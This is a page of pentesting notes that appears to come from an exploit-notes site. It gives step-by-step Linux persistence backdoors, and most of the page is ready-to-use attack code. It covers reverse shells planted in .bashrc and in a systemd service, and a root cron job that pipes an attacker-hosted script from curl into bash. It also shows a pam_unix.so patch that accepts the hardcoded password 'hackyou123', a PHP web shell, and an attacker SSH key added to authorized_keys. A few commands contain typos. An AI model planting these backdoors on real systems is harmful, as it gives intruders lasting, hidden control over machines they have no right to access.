# Linux Backdoors

### [.bashrc](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#.bashrc) <a href="#bashrc" id="bashrc"></a>

Add this line to **`/root/.bashrc`** or **`/home/<user>/.bashrc`** to gain access to target machine by reverse shell when the victim user logged in.

```sh
bash -i >& /dev/tcp/10.0.0.1/4444
Copied!
```

Of course we need to always open netcat listener to be able to fetch incoming connection from the target.

```sh
nc -lvnp 4444
Copied!
```

<br>

### [Cron](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#cron) <a href="#cron" id="cron"></a>

Add this line to the cron file like **`/etc/crontab`** in the target machine.

```sh
* * * * * root curl http://<local-ip>:<local-port>/shell | bash
Copied!
```

Create the **“shell”** file in local machine.\
Replace **`<local-ip>`** with your ip address.

```sh
#!/bin/bash
bash -i >& /dev/tcp/<local-ip>/4444 0>&1
Copied!
```

Now start local web server in local machine. Note that your current working direcotry need to be where the **“shell”** is located.

```sh
python3 -m http.server 4444
Copied!
```

Once the cron job downloads the **“shell”** file, run **“bash”** command to execute the **“shell”**.\
We should gain access to the target shell.

<br>

### [pam\_unix.so](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#pam_unix.so) <a href="#pam_unix.so" id="pam_unix.so"></a>

The pam\_unix.so module is likely located in **`/usr/lib/security`** or **`/usr/lib/x86_64-linux-gnu/security`** directory. It automatically detects and uses shadow passwords to authenticate users.\
See this line in the pam\_unix.so.

```cpp
...

/* verify the password of this user */
retval = _unix_verify_password(pamh, name, p, ctrl);
name = p = NULL;

...
Copied!
```

Modify this line to as below.

```cpp
...

/* verify the password of this user */
if (strcmp(p, "hackyou123") != 0) {
	retval = _unix_verify_password(pamh, name, p, ctrl);
} else {
	retval = PAM_SUCCESS;
}
name = p = NULL;

AUTH_RETURN;

...
Copied!
```

Whenever you login to the target system using the password “hackyou123”, you can successfully login.

<br>

### [PHP](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#php) <a href="#php" id="php"></a>

#### [1. Create a Payload](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#1.-create-a-payload) <a href="#id-1.-create-a-payload" id="id-1.-create-a-payload"></a>

Create a php file (e.g. shell.php) into **`/var/www/html`**.

```php
<?php 

	if (isset($_REQUEST['cmd'])) {
		echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
	}

?>
Copied!
```

Leave the php file in **`/var/www/html`**.

#### [2. Reverse Shell](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#2.-reverse-shell) <a href="#id-2.-reverse-shell" id="id-2.-reverse-shell"></a>

After that, start a listener for receiving the outcomming connection.

```sh
nc -lvnp 4444
Copied!
```

Now access to the web page as below.\
Replace **`<local-ip>`** with your ip address.

```bash
http://<target-ip>/shell.php?cmd=bach -i >& /dev/tcp/<local-ip>/4444 0>&1
Copied!
```

We should get a shell.

<br>

### [SSH](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#ssh) <a href="#ssh" id="ssh"></a>

We can establish a backdoor to allow us to be able to connect the target SSH server anytime by leaving our public key in the target machine.

#### [1. Generate a New SSH key](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#1.-generate-a-new-ssh-key) <a href="#id-1.-generate-a-new-ssh-key" id="id-1.-generate-a-new-ssh-key"></a>

First off, run the following command to generate SSH key.

```sh
ssh-keygen
Copied!
```

It will generate two keys, **private key (id\_rsa)** and **public key (id\_rsa.pub)**.

#### [2. Transfer Our SSH Public Key to Target System](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#2.-transfer-our-ssh-public-key-to-target-system) <a href="#id-2.-transfer-our-ssh-public-key-to-target-system" id="id-2.-transfer-our-ssh-public-key-to-target-system"></a>

If there is no **`.ssh`** directory in target, we need to create it.

```bash
mkdir .ssh
Copied!
```

Then put our public key (**id\_rsa.pub**) into **`/root/.ssh`** or **`/home/<user>/.ssh`** in the target machine.\
**scp** command can be used for transfering it. Replace **`<target-user>`** and **`<target-iip>`** depending on your target.

```sh
scp ./id_rsa.pub <target-user>@<target-ip>:/root/.ssh/
# or
scp ./id_rsa.pub <target-user>@<target-ip>:/home/<target-user>/.ssh/
Copied!
```

#### [3. Add the Public Key Content to authorized\_keys](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#3.-add-the-public-key-content-to-authorized_keys) <a href="#id-3.-add-the-public-key-content-to-authorized_keys" id="id-3.-add-the-public-key-content-to-authorized_keys"></a>

Also we need to add the content of our **`id_rsa.pub`** to the target **authorized\_keys** file.

```sh
cat id_rsa.pub >> authorized_keys
Copied!
```

#### [4. Change Permission of SSH](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#4.-change-permission-of-ssh) <a href="#id-4.-change-permission-of-ssh" id="id-4.-change-permission-of-ssh"></a>

In target machine, we need to set the right permissions of the file/directory. Otherwise we cannot connect SSH. Replace **`<target-user>`** with your target.

```sh
chmod 700 /root
chmod 700 /root/.ssh
chmod 600 /root/.ssh/authorized_keys
# or
chmod 700 /home/<target-user>
chmod 700 /home/<target-user>/.ssh
chmod 600 /home/<target-user>/.ssh/authorized_keys
Copied!
```

#### [5. Connect to SSH Anytime](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#5.-connect-to-ssh-anytime) <a href="#id-5.-connect-to-ssh-anytime" id="id-5.-connect-to-ssh-anytime"></a>

After that, we can connect to the target SSH when we want to connect it as long as the public key in **.ssh** directory is not removed. Before connecting, we need to modify the permission of our private key in local.

```bash
chmod 600 private_key
Copied!
```

Now we can connect to SSH of the target.

```bash
ssh root@<target-ip> -i private_key
# or
ssh <target-user>@<target-ip> -i private_key
Copied!
```

<br>

### [Systemd](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#systemd) <a href="#systemd" id="systemd"></a>

We can use systemd as a backdoor because an arbitrary command will be executed when a service start.\
The command is stored in **`[Services]`** section in the configuration file.

#### [1. Create a New Systemd Config File](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#1.-create-a-new-systemd-config-file) <a href="#id-1.-create-a-new-systemd-config-file" id="id-1.-create-a-new-systemd-config-file"></a>

Create **`/etc/systemd/system/backdoor.service`** in target machine.\
This service will execute **reverse shell** when starting.\
Replace **`<local-ip>`** with your ip address.

```bash
[UNIT]
Description=Backdoor

[Service]
Type=simple
ExecStart=/bin/bash -i >& /dev/tcp/<local-ip>/4444 0>&1

[Install]
WantedBy=multi-user.target
Copied!
```

Then enable the service.

```bash
systemctl enable backdoor
Copied!
```

Now this service will start when the target system boots.

#### [2. Wait for Reverse Connecting](https://exploit-notes.hdks.org/exploit/linux/post-exploitation/linux-backdoors/#2.-wait-for-reverse-connecting) <a href="#id-2.-wait-for-reverse-connecting" id="id-2.-wait-for-reverse-connecting"></a>

We need to leave the netcat listener running in local machine.

```sh
nc -lvnp 4444
Copied!
```

Then we'll get a shell anytime the service starts.